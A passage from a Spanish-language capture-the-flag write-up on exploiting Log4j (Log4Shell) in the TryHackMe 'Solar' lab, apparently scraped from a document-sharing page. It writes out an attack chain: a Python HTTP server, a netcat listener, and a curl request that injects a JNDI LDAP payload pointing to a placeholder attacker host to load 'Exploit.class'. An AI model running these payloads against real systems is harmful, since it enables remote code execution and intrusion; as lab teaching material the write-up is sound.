Documentos de Académico
Documentos de Profesional
Documentos de Cultura
11 - PDFsam - Write-Up (Solar - Log4j)
11 - PDFsam - Write-Up (Solar - Log4j)
Una vez hecho esto, vamos a proceder a abrir un servidor http con python,
para ello haremos uso del siguiente comando:
python3 -m http.server
M MICROJOAN.COM
J
M Write-UP (Solar - log4j)
J
nc -lnvp 9999
Y como hemos hecho antes, volveremos a enviar por curl una petición al
equipo víctima, la cual esa petición llamará a nuestro equipo con Netcat y acto
seguido Marshalsec lo redirigirá a nuestro servidor http que solicitando
"Exploit.class":
curl 'http://TRYHACKME.IP.MACHINE:8983/solr/admin/cores?foo=$\
{jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit\}'
M MICROJOAN.COM
J